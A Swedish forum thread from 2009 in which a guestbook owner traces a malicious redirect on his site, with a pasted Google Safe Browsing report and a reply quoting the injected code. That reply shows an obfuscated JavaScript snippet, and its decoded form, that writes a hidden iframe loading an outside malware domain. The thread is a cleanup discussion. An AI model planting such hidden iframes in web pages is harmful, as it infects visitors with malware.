redirect i gästbok

2009-08-10 14:03

Medlem

Plats: Norrköping
Registrerad: Nov 2002

●

redirect i gästbok

http://www.smkostgota.com/phpboken/index.php
var ligger den kod som redirectar varje gång man öppnar fönstret? Någon måste alltså ha hackat sig in o lagt in koden i den befintliga? Det finns ju inga inlägg med engelskt dravel på , dom har jag tagit bort direkt. Några förslag ?

Visa signatur

"nous somme les hommes de troup d´assault ..."

Rapportera Redigera

Citera flera Citera

2009-08-11 10:41

Permalänk

DUNXIII

Medlem ★

Plats: Lund
Registrerad: Jan 2005

●

Undra vad användarna tycker om att deras mail-adress skrivs i klartext i htmlen.

Rapportera Redigera

Citera flera Citera

2009-08-11 22:04

Permalänk

hamre

Medlem

Plats: Uppsala
Registrerad: Apr 2003

●

hmm:

Webbplatsen www.smkostgota.com har rapporterats göra angrepp på datorer och har därför blockerats enligt dina säkerhetsinställningar.

Rapportera Redigera

Citera flera Citera

2009-08-11 22:05

Permalänk

Garret

Medlem

Plats: Stockholm
Registrerad: Feb 2003

●

Menar du "Reported Attack Site!..."? Då är det nog Firefox som gör det och inte någon kod.

Rapportera Redigera

Citera flera Citera

2009-08-12 16:42

Permalänk

WRC

Medlem

Plats: Norrköping
Registrerad: Nov 2002

●

meh....jag säger ju att det finns en redirect till en annan sida då är det klart att antivirus o windows säkerhetsinställningar reagerar. Men var finns koden??? Kan den ligga i db eller finns den i någon fil ?

Visa signatur

"nous somme les hommes de troup d´assault ..."

Rapportera Redigera

Citera flera Citera

2009-08-12 17:59

Permalänk

hamre

Medlem

Plats: Uppsala
Registrerad: Apr 2003

●

Detta får jag som förklaring iaf.

Safe Browsing
Diagnostic page for www.smkostgota.com

What is the current listing status for www.smkostgota.com?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-08-11, and the last time suspicious content was found on this site was on 2009-08-11.

Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 2 domain(s), including apexsearchgroup.info/, 213.155.29.0/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including garden-art.gr/.

This site was hosted on 1 network(s) including AS16245 (NGDC).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, www.smkostgota.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Rapportera Redigera

Citera flera Citera

2009-08-12 19:10

Permalänk

WRC

Medlem

Plats: Norrköping
Registrerad: Nov 2002

●

hmm , jag får leta lite mer. hata hata

Visa signatur

"nous somme les hommes de troup d´assault ..."

Rapportera Redigera

Citera flera Citera

2009-08-12 20:17

Permalänk

cic

Medlem

Registrerad: Jan 2005

●

Det som stör är troligen script-elementet som ligger precis efter <body>:

<Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%72%64%65%6E%2D%61%72%74%2E%67
%72%22%20%68%65%69%67%68%74%3D%22%2D%31%70%78%22%20%77%69%64%74%68%3D%22%2D%3
1%70%78%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%
74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script>

eller, "avkodat":

document.write("<iframe src="http://garden-art.gr" height="-1px" width="-1px" style="visibility: hidden"></iframe>")

Hur den läggs till där kan nog ingen som inte har tillgång till hur sidan genereras svara på med någon säkerhet, men nu vet du vad du ska leta efter i alla fall; om det nu var det som var frågan?

Även, är det din <script>check_content()</script> som ligger längst ner i dokumentet? (Laddade bara ner dokumentet med wget och kollade med cat, så det kanske kan finnas mer om någon kollar mer noggrant. )

Senast redigerat 2009-08-16 02:16

Visa signatur

Ännu en webbplats utan innehåll, fast den är ju ganska snygg att kolla på iallafall.

Rapportera Redigera

Citera flera Citera

2009-08-12 22:19

Permalänk

WRC

Medlem

Plats: Norrköping
Registrerad: Nov 2002

●

jag tog bort bort alltihop. Tyckte det såg konstigt ut. Jag får väl ändra lösenord och hoppas det inte sker igen. Frågan är ju om det sker automatiskt eller om nån faktiskt lagt ner sin värdelösa tid på att hacka? Det finns ju inlägg i gästboken ibland som tagit sig förbi captcha bilden i loginet. Jag ska leta vidare o se om det finns något annat som ser skumt ut. Tack för hjälpen )

Visa signatur

"nous somme les hommes de troup d´assault ..."

Rapportera Redigera

Citera flera Citera

2009-08-15 23:44

Permalänk

WRC

Medlem